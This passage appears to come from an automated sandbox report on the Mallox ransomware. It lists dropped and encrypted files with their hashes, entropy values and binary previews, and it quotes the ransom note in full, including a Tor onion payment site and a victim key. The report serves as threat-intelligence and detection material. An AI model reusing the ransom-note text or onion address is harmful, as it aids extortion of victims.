                    Preview:a...B.....r.b..;N..dq&:.y.B4Y..6..4..p..X4c.J..oS*.M.R.S.P...$9yB..Y.j*.#.V....*.RD..S.....uE..#.Eu..DCR|.....'0^Oe.\.....TD.. ..a4d7..w.U.e..sl.?f.........x.\..0u...m..Z.|J....G...b.1.....^.V7GH......DT.....v..(.HJ...b..M..x...)..P.L.WM..:.|_....Q....l.7..}s..,3..6.'^O.H....c.E...)*TcJ...l.?........xf.oc..3.>K.....H|...A...\U\aW.oZ`.K.......*c..hLS......dP...;...3...>p[6M:....|....:..........GK{s.......D...........z..SI..:.EO.}B.-..>n...C...x..km....;. O....JVn.~......PG..M........ y.;.9.iQ.<.eKz...`.8.!....X.A...H..Io....1....".l.f..a.......gJ...@Ho..|.. 7.|+.......~=81.w.6.]"O..*..s...:.]W...y.=<...y........~A.Y..~....T^..P.E.?. -.@6bK....yu..j..;..4.._..x.[.._.*<......#*E.~0.LN..-]..1.2...p.2...K..Pfu.<:...v..Y.A.Nd.^.....Om."H...:..7....._.YV.S....*..3.X....(.Q.kl..(.(Z.x...0)...N.H7J..A./..y.sj.l..c'...4t..~%.;..2//....sU........)'Qz[.k..I...l.{...@...Hn9\./...Jm...z.pV:..b.........R....A~.B...u(.c.EV....;..F.U.>..w.$cWt*

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):31519
                    Entropy (8bit):7.993544345512345
                    Encrypted:true
                    SSDEEP:768:NUEXndfTpGSoHwyD8QJCncLlAAMIW9SGUMdWnmqzTg0N:qmdfTYHRD8QJrVdWbW5zTgu
                    MD5:F2F49FB4AC584B42E4881B14F45891C2
                    SHA1:0CEE7D5E7EA9AD2F359519A3681F16E91D440AB5
                    SHA-256:9373FE64B61CB4CAD41AEC24D9D9D3B7239FFD4AC73A0DECE64368DE72094178
                    SHA-512:04C827B26C5A83A0F1F754C62E0CB51968C3341754C8E187B1002125D442C36FDE6B843F16B8570151889BF8ED0F84727EB93807C01EB024047CE44EAE76BD1C
                    Malicious:true
                    Preview:q.......~..].1ob.2(..S=l...#....J.Ujw{..i...Ex.....v...1.g./.P.?..=_...).......?.T...s..u...0.p.t.,.^.&.a&.{.A.-U8K.!.9.....$..Y3..f...u...w...E#..i......g\.g.f.....2.NW;.`..| .V...G.7{UI:...r..s...p.){..7px...../X)....<-...%;@......~JM...u.LD..:.C.....t....b#.q..v...[P.`.Y.T.qO..m7.1&o... ..a...R..#.<.c..Z..B..i...y.......c..E.M..e...gI..F......#.9&.<,....i.X..-.&..-wi..wxx=@i..L....s..@.+....5.*.?..@"U..(1.Y.$.Z.;...9..i.+.Ln$y.^.d`.j..n%........'........3_..d........~.....n.L.f~...8..`....).x...6_......QW....P......uk.mUk......A[....;9.L/V@.X~z..^......M...F.uL:.RU..]..[.r.-.M......n.A..Y.....F!....(%..%.$^.*.....u........Mrg.*q:.e...7jvF.r....+.CN....:3`..G.....(.....X.!B....s.1i .3...M.Jv...H.s.g..c..c.....(.o(..-..4.\....wy%g......... .}....6.s.l1w.QAI...WB..:.4n.o...".G.....\]..=.).|\...UJ.C.......z.Pd.6....0.@.d...j.9C...O.0bSG..F.l...xt.KYgh.c.....Hv:S..]ok.j...$...@.....P.@G..1..;#.K!.O..r.........7%V=.o.(s...l.R.....*=..1J._(

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.991310156079733
                    Encrypted:true
                    SSDEEP:768:Uh0AAvFSWcjIuHbMc0/b7e5lEq3B3GSdTbNFO/C:Uh0A4Cjkc0D7qG4Oa
                    MD5:91CE56564664DD4CF6825F5B4F7E1445
                    SHA1:BF517507BC5D0BE9ACC2E2A67CFDEA00AD333889
                    SHA-256:774A5E6A0023EBF058BFDEB47F570087B4CA85A5F8C64722B1A82379257B2C6E
                    SHA-512:3FF8A9E953A5BAF78CC0242ABC67A1AF2527DC39EBDF53CD5D7F8A1BECFDFE30B8542B0D9FE3D74CB262FFA5C7EB12DFB0840616933BED2426382A9117D27F81
                    Malicious:true
                    Preview:O7\;=PS..].....9.W.%)............i......-.g3=.B':.6z...2?~F.XK{...J?....(D,ML........|...x.....o.E.......lS...<S7.Z.;.'V.Ro.h....0.K.$.Fp....-........qb?Xe7A..D..0.M</T....i.#...J.....H..4...NaB....4.L..J..;M....r.d.e\."........}dA.!y..X...3m....{...5LU=z....mJL>.Y2.#%....5.$_...........a.X(a......M9M...%..0....l.....HV.:c.........+~.d .>...h.<.y..o..V...e.......!.H$..g..?=6`.D.5._...F.27...*8."X....I[Fs.N.;.,..`.9..m.z..8xy......zG]UY.. .=.E.oz.r.4...+...4.o1.B).M.A.:....C....-..HtI.......{......X..b...`.Z........3.:.....E.#.P$,.t.n..:....h.p.7G...`}D...|.H........,h.m.|sZ...~.t.......k...T3..I.e;.L`y....Zq.fL..."..s.:....iB........"..N....}.U..)...cj...N.oG'..o..Y..Mz"5K..)V.&.1..M..}...m....VI..,..g....%{..-.W..fk9K....O;GO.B..x.x..5...7..,...]...|*|S....j.x,.:...]W8.......v..CF..O.W.e...-..).pG..=D|?i..cD.h../|.u...*.m.%.'..K|.....c/.Oa..R7mo...Qh:..S_........M.E..?<..".D....}....I.j....gd.t....^........E.....Jl_Z.6%..T....w..../9.x.$

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.991924023783889
                    Encrypted:true
                    SSDEEP:768:OBUPnVCNbmN2bjzHjVNEg1T2NGnPB/P51XXDxpr:3VCNbmN8o4npjnDn
                    MD5:4525821B993738DCC666A0BBC651248D
                    SHA1:8149FB07C456B777EF2CC04C97C5876E06ED8F39
                    SHA-256:B92CF6A3A5D5DD66BC33D678F7C975E521BEA0CCA77BCB99A51167FE3BBD69E8
                    SHA-512:B41A21E621A1787A7BDAF3656117BE5AEE03FEF0F959023093E1D0710744E34F70150843268A09E9AC838A6A140FB3D4CAB59C91B646E7121100FF47E2C4DE26
                    Malicious:true
                    Preview:d..[.2.Y..7.PQ..M...^.......P..W..W:E.C....Z|.m#......O.iK.../O.Mt.qo#..W._U.`.)..CEl0...v5.-j.E1DO......B.1.....A..',....I.;2fwB ....Rjo..{.DVd/n.M!..X.....b...W......#..Z.H.DP.W#.....>.T....tJ<%..4.&.c.P..vx.YP.b2.Q....&..eO?...rPLo?S_^... ..5G..]q...F...w..2{..2..P.. .*....U./d.Os]tm.....J).....59.NH.\c.|...}I{..I.B,.{....0S...P]....o..D..J..$Yi.D..7s....c.1.O..d.$.n1.Y.a..k.<...."..#..p...z.5~o.[..IRa.S..>..~j'.....=.r.w..8....d..|@..R/....@3+.._...S.g.$.......]..8.3..M.8.w*....%.......c.....T.P..D.^..s....3-..7.V....}.N.......p..t..S.v..1.....y5.i.}P.s.$-"...A.`.b.j9.N..Z.l.F.ne....?.X1)...bO,.*..;....O`5C%)T.F4.w.....R.....?.....Y....f.*../o...........e.w..&&...(6.i$}.o8...i....TYO.Rw..y8+:7.......K........q.>%.$.....I..r...1HX........K...V[...L..W...B:..?Y\..S....."....(l<....q.@VN.....W..]7O....^QX..\...r(.).\.[.Q..5....V.......G{ $8..w.M.m.0.p......d.}.^o.W.d.5..t......!/.W..q{6......8.b.Q.^..#C.>X.......#.F.a....8.3{5ag_...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.992249285267251
                    Encrypted:true
                    SSDEEP:768:n6OTSyXl9fkhy8ZedXMqXLKXCBAYRdegJe:n6k1XMQPtlKSA2e
                    MD5:B9ACB313E277DF746E433631C82F7E6F
                    SHA1:A4879DB76E48150E94A6F62EAA333B18742C42DB
                    SHA-256:E03DEC90EAE1B10DA2E7F12EFC20C1B75C22112B4EE5EB91871F04568CBEBD61
                    SHA-512:A99A5A75C7A560C9F983B4BCEDC3A7D0E61CAFCD1359FEDC5445FF74EE9B26279473CA3D6DD965898818516AD0DFE389D5885719BF9AD74E6366ACCF96301577
                    Malicious:true
                    Preview:Z....3. ...h.F.z./4h..#.8P..f.7...6...)3~&.....=.9'=..C@..{E.T.7i.]...7c.'.3t..F:......p.c..9.^..M.....|..+9v9.yf..O4F....ii.Il..M.r8^.>L.d.fv|.\.NL......8N...r.=..(j.G.W.~1.W.O.?..\p..<.>........N.`$(.8..pz.x~..1d..c.......H.EF.7.fN.E..jK......w.....\..f.1..\..2.....'....-..=.j.TMj..,...FJ.[........7..g.B.x...Sl..2....._.sDa.........'.3Xq.a.......@......[...ad."M`.V6.,2..@..3..,>....$S..T.c*sf.[j._.%0<.0.....ku.k{.Q)H..........\.&..6..K.3.G{k.A..XJ0.X...=..N.8.x...x].rw...=*.y..p..r..c%.6t.?...B,|.2.......P".\.Qa.......;..g...A}t...X07....m.G.....=.H..Iej.OEo '.?...f.....a..H}orK.:."..).:.RN....i.U...>...W.X......\"..#...<..H.M...#..(QDU....|.W.VU.&.].M.M.....tu....G\.A......).g.}..o.a.....bW.Fvy.~.;.V...m._.!.........jx...f...SO. @.B%qq..N..........H..S.........9......#..$V..J...I....~P.....z...D....6].....ES.kt.....<...,:..........#.E.R.-."......I..z.?!.......;..]xJ...2{..oajwJ...~.I...D..m.=.FS.m...].d.e....d.M.i.w~.|.f.....xb|).. F.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.992576935399091
                    Encrypted:true
                    SSDEEP:768:jnD19U4urqs4/Rt4Ud997xtcB7oZGovXBOq0G2:DD19ous4/34Udz6OGovKt
                    MD5:5F07173E84A11054FE1DD377E88EBC65
                    SHA1:DF861ACC65734875DAF38AE0922572DF34DFC847
                    SHA-256:9A1AC07DF9434B4BC0CA809E18D79CA6888241AEF268AF0A91B8B9B613DE66C4
                    SHA-512:43FA71ADA07B5BB8205376563B9FF169DAE4DCFF7842851EA3AE6EC401DFD51ABC907311B8F41A26094DCCEE084F0DBFA8C042F2CD6D8CDE4EA1B2BFF62C6377
                    Malicious:true
                    Preview:\..P..J..C..y....._e..e"....Jd.... ..\_4.#h^E.....B.3,..b.\Zb...-'...q*.@.|h.~......+.1>..k:#-....L{..CLQw.....b..5.h.o.......,.....@.F9.?P....mR/...p.T.....nXM...f.....5,....+th).K.g.h..R\.XX.3t.eVI{..%...]@;.X...c....>.\1.b........A.......:]..({I...rR0O?..!m .....[...4.../b.....v...WQ_.I1......L.Q.R..,3..E..XD1... .4._......S........k&{..+..wX.K...n..>...E.~......b...^...T...;.@......k......:t...)...%...B.W..d':...j..^..<.........vS..........m...$j.h............1.(@Mq.a..9+".b..R.H..}..h."....&.....ByKO.kJ~.....|Lz.:...L{..d^.....be}.6......Bj..\.tWu...;.~..@...C..yY.:.....(..E...G....H.|.z..l.......H.T[z..l....z|#m.~}.:...|.j..._.:T..*.....K.p..O....sL.?n.b..Vs...fo.4Bc;....9~x....+..E.p=.F..].a.Rm.F.>...e..+,......T#.......(.b..\..+..............S1VS...-.SZ..hA..f9.hj.bW#F..;"../.......~|`V.u.....F[..{f!...=B.....?J'..@.$.......\..&...... P..dF.|H..:-.{S.!...........=]v.Rb6.f..oM.n.3V.."..9.[/."k.0.l+...'......<rn..q.rq.f.$.

                    C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install-2023-10-05.0950.8672.1.odl.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):2.8625103924954094
                    Encrypted:false
                    SSDEEP:384:3KRsb4oMoOL5l4ZSRsOgz9QIqfuTJ4nGribaW3owhC2GK:es9ZOVNRspzSHWVwGri+4C2f
                    MD5:D9ED4826EF9142EAA9678D9E2727ADE3
                    SHA1:2B25DD2FAF7CD107EBB0C3C3B15AF1AA02068362
                    SHA-256:333CA1586FD33E30B223BA883590B367599A942A1F7EA7638838A1018E9D40AE
                    SHA-512:308740CF91F096627D3477A67BE24423433903457563E10A4DDFC00D3A629D2165C54FFCABD247046CBEAA1E6E1DAD9CEE52DD38618CBF459294C0EA8E4D2846
                    Malicious:false
                    Preview:&...E?..t..&.y..).. .&.........D..p.F...s..........]C@~......Z......5B..{z..va.rqX.".n...gPLc....x5..f ......c...f@ ..@...9..E7<..S...p.n...d.,........|#X...9s[.8.N{q.1...e].RO..y!.....je>.lC_J7....<E...u;..^D.5[....+..g..P........}.%}Va/...#=..D-4..m...{..>0.f.(.30~-....cL<.L7.M.>@.........P..;gT....+Jf......(.}m+q;.&....7. .J.20vMg ..'J2.f..g^v..... 9...<..a}.....z..".IS....EO..?."BY.l".P....'.......N.*........0.=.....}.X}d+.q[..U.....+.S(j.j=.V.h.n|&gw. .4.....{.$.W.$:5.g~..c.~.f...S>....=$&...:....>.X..}.'.......H|IN.y...d.....|.m...0._. T.-.Z.H|..m...r.g..;9../...t..z..Rs.ZH.._h......._k...)...M.ud.2U...).1U"o................&m&!..J..,.hb9..].....V..7gH7..._R%p.V..G......K.d.}.....k..Vf%P.$.[.;....B..h.6..w.>..v.........%n")a.z...9..p.Q.h...0..am}...K.I..s..hl_c....8...................w.....4. .E.W...;...J.i4..9~D......5...O..$]'-6)..@:6Z....>.Yy8....ck.m. 1[..L..>..L...%.|..Rzf.8...L......kV".5...y.e.r.M@.9..._&.(n.j.r.. N..lkR.g3...6

                    C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.0950.7664.1.aodl.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):4.662748825263218
                    Encrypted:false
                    SSDEEP:768:avbbdXnYQ3vvZiNgt2JyzuIrgd7MclejkZ0W4Ww+sU55:avb+CYgtbqdnejkZN4Ww+J55
                    MD5:740706B71E0E29D4CE602305296F3CB0
                    SHA1:B514B8D6043E73B82235E2D3E8F18E334C529FE4
                    SHA-256:3040563F62C7D309A52F120BE552A477EBC3DB200AFBF9BE4E42D2748F854A22
                    SHA-512:FE6D3C59573E2CA6B5CF8662166BFFDB17EF534391CF3BDEB0703359F11D18617BCE4E58B926B0CBB1CD0C55F7157682EDE1DC96A2ADE6748D31451B483840D0
                    Malicious:false
                    Preview:=O.E0.P..u.."Cgg-u.K....+.8./x../.V......e/....0.o...w.e.S>"..>..a....i.!...B...6....1.f..9...FwF..T92....6x..r=..."Qg..k.O...5...dk|u.........,@....sl..)....hLS.B:D.FYM.9.@..J0;s...zE..A...h..Qt...O.5\_..=6..B...2R)......V..z@`a.....2..~.*n&q.\>...Uof....q.<........<..[.1@.....E6..f.v...w......c.2.N.^......w 0.cE.....e......Q......e2..^...1......'4R..\.W.s.r%..d..- ...d.....P..._.....l..b..7N.-.h....mc.V.....X/../..oM.0.UT.B...v..9}.pY...K0z.W4.]rKv.B.4z.<...IBs.qH.....gw....Y.B.....9....>....Ua.{ ....g.P.q.;.*...[k...f...Ab...4n.]>.X...>..w.C.!LB...b&..C@u7z...&#.*i.U..c;(Wo..(.g..*.U....|ZN..#.=........w...o..1.:..$./.w.Za.^w.}.......Z%F..q....M.ro..Id.*..u.gR...Ef.....q..>........u.C..4c`.LD8-oh.......=..\.l.X.,....cjHX........e..9.=.{...M..#P\Gl......W...SK....V..b$..6.....U..8.#$.p.B...IQj@......f...X.....TM.W...a..`.......J.....@.o.........Uo.rl._......U.t..M2.../.'..d%...e.y.&..v.....S...PJ47...:.Z..H...+'..)\g.....7J.E.mU.

                    C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_095014_23f0-23e0.log.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):7.934520769499088
                    Encrypted:false
                    SSDEEP:3072:p1ceonJrZXHlvz7dXabOgCr7lL++/o+2vO3d:peeonFACXlL++/o+22
                    MD5:9546976269589DB60063B9EB2CF5415D
                    SHA1:885C8DEF252ACE17CFFF3CFC5203AE605CD2F9B0
                    SHA-256:A5DF75272959E20D0E308597D6E65B14E3A44913491CFB671F72E9DA72AA2AF0
                    SHA-512:CA2EFC40B9C83B3B39E6187B4216A3E0680EA7B76C58BA4531034FCD413DDDC37466479FF0C4539B15F4CE7B2913676D4FBD11BB10FBCF2A6D1FD894B6748E5B
                    Malicious:false
                    Preview:......."8.|.q.H...aRi.$.".5.I.......b).P.AD..qN..8g3."j.e....z..j0.U...W...)d........r...N.q.F...f.XD.v...N...Xqt.r.3...P..1...C,.G..s.z.....e........l/....*.g...:..Bb....@.t.,..H....S.jQ..nfL...Zn.&'.:..YB6.......a..7Lg.r.E.f....6M)M......O..#........e.u.$.K.|Q.&T...V..#..;H...-........!%0.?..~SW.....k>..]...Y.....#1....N...U.\. .G_h,-wP.H:`.R;.7..-C.].../f..-.e.X...xe..:...O.a...w..V^?..;..B,f.pVQ!.c.W.T:h.1..PH.../1,..)f..........s......]BI.YaP$...YQ.R.>.Z.Ua....K.Ddn..Xp..w.C.......C.Z.2..H....m..q..@...{...5...k..F.@..b..6B.L.oY....}..RrK..%GN;...2..eDK.7...4.i....H,..' :p.-=.ga......L.?......l......O...>.4.9.\. ...Q...h.yu...}.j.'.^.x#.5!.(a.`.....9.E.:SF.W8.OU.?....6.i*0..qw1h.uj..q}......x#..G9."jEn.l..X.&t..8..$.....x..Ul..Q.\.[..^t...K..iL..h....`..5~....bp.=.n.......3P{.....OqS..........H.u.............+..X..S.a.,.?i.]G...B[.....t/..Q..}....]..B.%.d.)rd..t9.C...y...a.AR.s..Y.)~y.!........*.!;......1.Q..3......).Q).1......6HD(.\.

                    C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_095041_7664-3424.log.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262144
                    Entropy (8bit):7.928259255780496
                    Encrypted:false
                    SSDEEP:6144:vUOe1msJikDMg2mLvMc96R9MDBsMJEh321iWyW3j0N:1e4qikDMcLv190QVJU2+W3
                    MD5:68AA3AA70D2EF4D05E5E25785F0D95F7
                    SHA1:3F2520FE2C7F7B969A468AE3302736E19D4A8742
                    SHA-256:E1160BFF3D24BD2CA8B78D107CE1B74073699E985794D563E6C1E20EAAB7D46B
                    SHA-512:C952A8C34147B32B7AF93099DAF61B6DC64124182E04F0C58AB9FED28BE367828126A6DD01F6C07828AE6439B023637B8E6519FE9876DC611D05DFACC633D93E
                    Malicious:false
                    Preview:p.H.*;Q.W.>..4Bh^...u]..E..3.o.M..l.6..Eu..%.Y../..=O.A..e]...]#.......3...:w6e.N.P..'..!...Y....D....x.....c........q....d..,.?=R.w...T\.0M.........DI...V..o.....E..V.x.....$r....XX...5..@]......h.U.^...F ....B).#`Aj.....L(.g.u.Y...kI.[..c.[../....6a..N3.{..!=....)..7.......V.q(a.....1..)".:...M....C...D.V5......|f......<.H.J..;.c....WG....Ig.k.|....t.........qN...4.:*@....?.|cnh4V.a.[..5.)...>c..e.......\.N.ul#...i...XvM.}..:U...0..#.y......(..N.2.K.Xe.B.jg%...r....y...[.Q.n=vC9.5.w.,..+..4.....*R..{.....$..3....oO>.7.....O2..q..J..tv.........Y~...^..A^..-.....W....*..A*....1..;.L)F...A........_.8..k..sX..0.q..0.......|...x.n......P#....G,.F._2.^y.....XokD.0 ;..Y...R.>..-N.!.6....%]$@.1.&]..n.)...0..:...Nh4.k.!.Hh../..N.B)h....{.i.^Ql_...m.D.|.m".O.fal.jN..#..h.....~3\2a.....o.r-W.1....I..b./.>.[..9.I:...Y...h.^..].=..,...R..@......)^....-O...+...`S..&3Y<........N7..DA..'..E.|[.Uv.&.(.+.d.R....'Z...*q....q9.jv....N....C.....U#N.r.+...U<.S

                    C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install_2023-10-05_095006_950-1db4.log.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):30042
                    Entropy (8bit):7.993793545764159
                    Encrypted:true
                    SSDEEP:768:GfSkPBCbhokOYgD4c1VPykK2ptH46NwIjupz+hB:GqSkpgMc19yHOlJKMB
                    MD5:EEFBF38B11F98A8AC94BE4C87D8319C6
                    SHA1:194D19AE1400F35C020391B0B94FEFEFF8F8637F
                    SHA-256:ACFBBDCEFDF4B07DEA478E40D0F64CD23D52B689ECF91F6E0F8B05CDA2119AB3
                    SHA-512:0B04F7FFE4101505B0E5B0D759D148F8D6BDC42E0878D504E6AE10E4EE92E23D4FEBE5EE0F380D827C8BB3FF4FF88273DD70B73BC010F63A6CF9AAD359260060
                    Malicious:true
                    Preview:.j.......]...X+..k...b.^!.(^..q/.L..k.*3....h...U...I.x..k\.;I*.T.`fD.c.w.....P............+/..".~.Q|n.,t...2.....1..BK.ii...vh.-Y..b.p..r.2Q..L.`._K.{..P.N........j.m:.&.R5......*.=.....p}..P.....f...P.;.....?ia..i.6.2r"...G1.n~....p. .0..8)...u.;.....N..0(........k.d..(..*..s..{......B.....Q.7V.c'}h.n.=6..{...o:....U.u...4F.:]....].G...C.U..<.x.2.L...M.$=...x....."..z;..E#.+e..3.?~B...nK..'.A...W.n.{e.T...n... ... u..../WO.....%O.Eh..O.8.-...3...;3pCT....[W..5..nT;G.u_...F.u.JK.sj.^.0.>..Tk!.Xa\....7....cN.,..N..({....S.0..zr.g...C....d.H.@.=_......Y....$.^7.......z.o9..#...i=X...Vh*...|_.x.....o.P)......%"w^.y.%&.7|..ll.6..r......s....TE^$<..@^..Wi..../.LT[.....u....N)Z..%..X...i'`.co.x.-..|....1..U....|n.X.Fa.%b..sB...%..@.L.o:.......{7..NX.....+N"...z.y.g...3../..E..1D.....]...v..T..$.-J...@|......~.n.P....n....x.f.z..c....u".Rs.=`Z.@.'.\...D.]5..F]77...A....s.....f:... .^..$:.f...[.4.....z...v...cO.}a..b.W.jC......8

                    C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.993761180141098
                    Encrypted:true
                    SSDEEP:768:AV0JPcPKgzX24mBkoA4K798o0JkUqMA3KnIc3fkW8sY0XeWbS0SeFdidDxP:AVDFjJmyoG0Jk53KhPXeWbS05idDB
                    MD5:06A52AAFB0D1C1C67089069B2AFD1E0E
                    SHA1:E9646EDF34AD4A8D90E3802647E7A688A01DCC3F
                    SHA-256:CD6CF25DA8C833F02131A550AF1B5697287C918BACF780F474CE253CE3876988
                    SHA-512:9E8EC0C3D8803CDE47201D7F189750F4C1632923855218638548480F3633D6911F646CE8C0AD13B4F8A508F8233EE664635C003835AF5C007F78AFDB3C50D371
                    Malicious:true
                    Preview:.v."....x(....q..7|p3..RI:.... w.d.oh1U.C....]....%.f.].a).`;..qf.w.D..O....>..J....&.%....[F.LI,.......B.>.W(....B.........l.3...q......H"C....q-=N..)....H..H..x.Z.}:J.V/.......B.%(.@zq.......B".VE@...*.M.+.4...B....2.7B....._.LR?.o.....XS..s..*].....[....>.Yt.......id~........Tp...q..O^..`..ro.*..B....#.e'>l......^$.?..:......o1@6..O...I...PQ.....-....x..P....G|[.1N........1)...!L........kW.._..l[..Fb.r..X.....U./..Q..dX.w........j..1J...i.21f.......@?+>...#;.YQ...{.SO...<..|.X......Z^ILLk.l.@[,.a...+b.Z..$b.Y...n.......!.....J.R..s.Q.\tI....-...m......`8<=...i....yn.......c....rr.....oRw...x....Pu.0.........XY..dD.P......g'.=)1..-7..&..7O..UY' .}hs_.}.#....W1.M.iY.e...D.tZ..%.-...]%Y?..!.n_4.... .5lZb..k.H...c..m.!,.9.x;&....V.}.,..4{Po.(c.u4.$..S7.UY>k.....3..{.]...p..B....r.!.!.U....t.....Oj.'9...V.......P.Y.G.=k.!;..3X.N1.Z.Y.}..v7..!<U..R(SR.....;.D..4I.X...(...Z..E........i...@...5g.,T..>u.] ..<8...J..O9.Z..".p6..../.%..p..z...IN[w.......,.

                    C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1339140
                    Entropy (8bit):7.999859864014468
                    Encrypted:true
                    SSDEEP:24576:13T0aZFWX0ZelaLhd+JTB78GjJKWf7NseHdbTufFQ47qM2WQpwfPU:94X0o7B7lNf7NsybCfFN7WWnfc
                    MD5:636008F215BC0AE74D19ABA04C56BCC0
                    SHA1:F558D4BAFA9F1922079637973ED3E54E29B6DB71
                    SHA-256:0B9B86C70AAED8F4D1502DDE5EC2AAE57DD6F2ADD5B210182F193BCC69B6A91C
                    SHA-512:B4E15796BDE3CE26D3D51C094892DBC5E7F14006F5EFD61EA34503DE6BBE34AA6ADAB9D6D188E78CD7017195A927132428F574A6C9A072D700565DE8BD6719C0
                    Malicious:true
                    Preview:.u..=?...l6....K.H...;=$hV.r..l.A.F$.....AO..XM...U#...A}+B.[..Xa. ..w1..^..^.AyA..E.U..t...V...t.\ok.L.T..`G,.r.2..q./F...>..&O.=........'=.'..YH.....[).!6...?....Q?[.e...A...B..D.MN.....?..?.._@.N..).._6.;(.5N...^sS...*5 ..0...V..r.#.L......H.Y@.... @.k&...0}....0F7.X ..n...]..x....C.......*.O..."?g.....e.....iE....u..`..r;.........j.Jr..01.l.<...|.......=U.e.......q..l3.=....D&...p...Q..p"......4xQ..L....[\.h...V...,H.....&....h...^..U...%......!.....J....u......r.....]{&w....._.^.P.B...Z.LS..C4..6iv.#..4...t.#......$.&....0.2.=M^Y.d..........1.......oV.(.R....j.k. @:.s..4..2...-$..R.'h.@,...{..|B......!....k.........B...[..VmHj.......l.R.Oa{...d.v.h..5....X..%...1o:.........e@.SW7...6|o... .._..F.b5.gx..u<?..qh.....ib....k..w.1>I..Q.......+~...Z..g6%..U.........5~.UT....s.u.0....9;&..MeB>.....l.{]<J`p.[.-HPaA....T...8Q.....N..k...v..........1.W....Q.....~.../8....{...g^:..F.c,........!.`...Z..".bC.-...%..8.Bc.,....e......s....

                    C:\EFI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\EFI\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
